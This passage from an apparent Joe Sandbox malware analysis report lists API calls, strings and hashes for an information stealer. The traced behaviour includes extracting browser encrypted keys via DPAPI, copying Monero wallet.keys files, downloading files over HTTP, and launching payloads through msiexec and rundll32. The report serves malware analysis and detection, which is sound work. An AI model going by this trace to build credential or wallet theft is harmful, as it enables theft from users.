                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: be8ddf1fe9dc456048681201925a0f877c5bcd284375678f65f072a6cae44d7f
                                    • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                    • Opcode Fuzzy Hash: be8ddf1fe9dc456048681201925a0f877c5bcd284375678f65f072a6cae44d7f
                                    • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • memset.MSVCRT ref: 00410C1C
                                    • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                    • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                    • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                    • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                    • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                    • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                    • lstrlenA.KERNEL32(?), ref: 00410CA7
                                    • memset.MSVCRT ref: 00410CCD
                                    • memset.MSVCRT ref: 00410CE1
                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00A12D90,?,0042110C,?,00000000), ref: 0041A82B
                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00A14A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                    • String ID: .exe
                                    • API String ID: 1395395982-4119554291
                                    • Opcode ID: 77704baf693414c0c6232ee0e38bb13a65318062e1f1704c2aae0d7082b93def
                                    • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                    • Opcode Fuzzy Hash: 77704baf693414c0c6232ee0e38bb13a65318062e1f1704c2aae0d7082b93def
                                    • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg
                                    • API String ID: 2244384528-3785015651
                                    APIs
                                    • strtok_s.MSVCRT ref: 00411307
                                    • strtok_s.MSVCRT ref: 00411750
                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00A12D90,?,0042110C,?,00000000), ref: 0041A82B
                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: strtok_s$lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 348468850-0
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    APIs
                                    • memset.MSVCRT ref: 007F4505
                                    • memset.MSVCRT ref: 007F451C
                                      • Part of subcall function 007F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F9072
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F4553
                                    • lstrcat.KERNEL32(?,0064A30C), ref: 007F4572
                                    • lstrcat.KERNEL32(?,?), ref: 007F4586
                                    • lstrcat.KERNEL32(?,0064A5D8), ref: 007F459A
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007F8FF7: GetFileAttributesA.KERNEL32(00000000,?,007E1DBB,?,?,0042565C,?,?,00420E1F), ref: 007F9006
                                      • Part of subcall function 007E9F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 007E9FA0
                                      • Part of subcall function 007E9F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 007E9FF9
                                      • Part of subcall function 007E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007E9C53
                                      • Part of subcall function 007E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007E9C78
                                      • Part of subcall function 007E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 007E9C98
                                      • Part of subcall function 007E9C27: ReadFile.KERNEL32(000000FF,?,00000000,007E16F6,00000000), ref: 007E9CC1
                                      • Part of subcall function 007E9C27: LocalFree.KERNEL32(007E16F6), ref: 007E9CF7
                                      • Part of subcall function 007E9C27: CloseHandle.KERNEL32(000000FF), ref: 007E9D01
                                      • Part of subcall function 007F9627: GlobalAlloc.KERNEL32(00000000,007F4644,007F4644), ref: 007F963A
                                    • StrStrA.SHLWAPI(?,0064A0D8), ref: 007F465A
                                    • GlobalFree.KERNEL32(?), ref: 007F4779
                                      • Part of subcall function 007E9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,UQ~,00000000,00000000), ref: 007E9D56
                                      • Part of subcall function 007E9D27: LocalAlloc.KERNEL32(00000040,?,?,?,007E5155,00000000,?), ref: 007E9D68
                                      • Part of subcall function 007E9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,UQ~,00000000,00000000), ref: 007E9D91
                                      • Part of subcall function 007E9D27: LocalFree.KERNEL32(?,?,?,?,007E5155,00000000,?), ref: 007E9DA6
                                      • Part of subcall function 007EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 007EA094
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F470A
                                    • StrCmpCA.SHLWAPI(?,004208D1), ref: 007F4727
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 007F4739
                                    • lstrcat.KERNEL32(00000000,?), ref: 007F474C
                                    • lstrcat.KERNEL32(00000000,00420FB8), ref: 007F475B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 1191620704-0
                                    APIs
                                    • memset.MSVCRT ref: 0041429E
                                    • memset.MSVCRT ref: 004142B5
                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                    • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                    • lstrcatA.KERNEL32(?,00A19220), ref: 0041430B
                                    • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                    • lstrcatA.KERNEL32(?,00A19910), ref: 00414333
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                      • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                      • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                      • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                    • StrStrA.SHLWAPI(?,00A1A768), ref: 004143F3
                                    • GlobalFree.KERNEL32(?), ref: 00414512
                                      • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                      • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                      • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                      • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                      • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                    • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                    • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                    • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                    • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 1191620704-0
                                    APIs
                                    • memset.MSVCRT ref: 00401327
                                      • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                      • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                      • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                      • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                      • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                    • lstrlenA.KERNEL32(?), ref: 0040135C
                                    • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00A14A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                    • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                    • memset.MSVCRT ref: 00401516
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 1930502592-218353709
                                    APIs
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                      • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00A1B398), ref: 00406303
                                      • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                      • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,00A1A780,00000000,00000000,00400100,00000000), ref: 00406385
                                      • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                      • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                    • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                    • lstrlenA.KERNEL32(00000000), ref: 00415383
                                    • strtok.MSVCRT(00000000,?), ref: 0041539E
                                    • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3532888709-1526165396
                                    APIs
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                      • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                    • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                    • StrCmpCA.SHLWAPI(?,00A1B398), ref: 00406147
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                    • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                    • InternetCloseHandle.WININET(a+A), ref: 00406253
                                    • InternetCloseHandle.WININET(00000000), ref: 00406260
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID: a+A$a+A
                                    • API String ID: 4287319946-2847607090
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • memset.MSVCRT ref: 007F0E83
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F0E9C
                                    • lstrcat.KERNEL32(?,00420D7C), ref: 007F0EAE
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F0EC4
                                    • lstrcat.KERNEL32(?,00420D80), ref: 007F0ED6
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F0EEF
                                    • lstrcat.KERNEL32(?,00420D84), ref: 007F0F01
                                    • lstrlen.KERNEL32(?), ref: 007F0F0E
                                    • memset.MSVCRT ref: 007F0F34
                                    • memset.MSVCRT ref: 007F0F48
                                      • Part of subcall function 007FAA87: lstrlen.KERNEL32(007E516C,?,?,007E516C,00420DDE), ref: 007FAA92
                                      • Part of subcall function 007FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 007FAAEC
                                      • Part of subcall function 007F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,007E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 007F8DED
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007F9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,007F0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 007F9948
                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 007F0FC1
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007F0FCD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                    • String ID:
                                    • API String ID: 1395395982-0
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • memset.MSVCRT ref: 007F0E83
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F0E9C
                                    • lstrcat.KERNEL32(?,00420D7C), ref: 007F0EAE
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F0EC4
                                    • lstrcat.KERNEL32(?,00420D80), ref: 007F0ED6
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F0EEF
                                    • lstrcat.KERNEL32(?,00420D84), ref: 007F0F01
                                    • lstrlen.KERNEL32(?), ref: 007F0F0E
                                    • memset.MSVCRT ref: 007F0F34
                                    • memset.MSVCRT ref: 007F0F48
                                      • Part of subcall function 007FAA87: lstrlen.KERNEL32(007E516C,?,?,007E516C,00420DDE), ref: 007FAA92
                                      • Part of subcall function 007FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 007FAAEC
                                      • Part of subcall function 007F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,007E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 007F8DED
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007F9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,007F0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 007F9948
                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 007F0FC1
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007F0FCD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                    • String ID:
                                    • API String ID: 1395395982-0
                                    • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                    • Instruction ID: e55a230881a7b7b3055dc6d8b9eb2fdd4f33510cda32948fbf5f3c1b17b70ce1
                                    • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
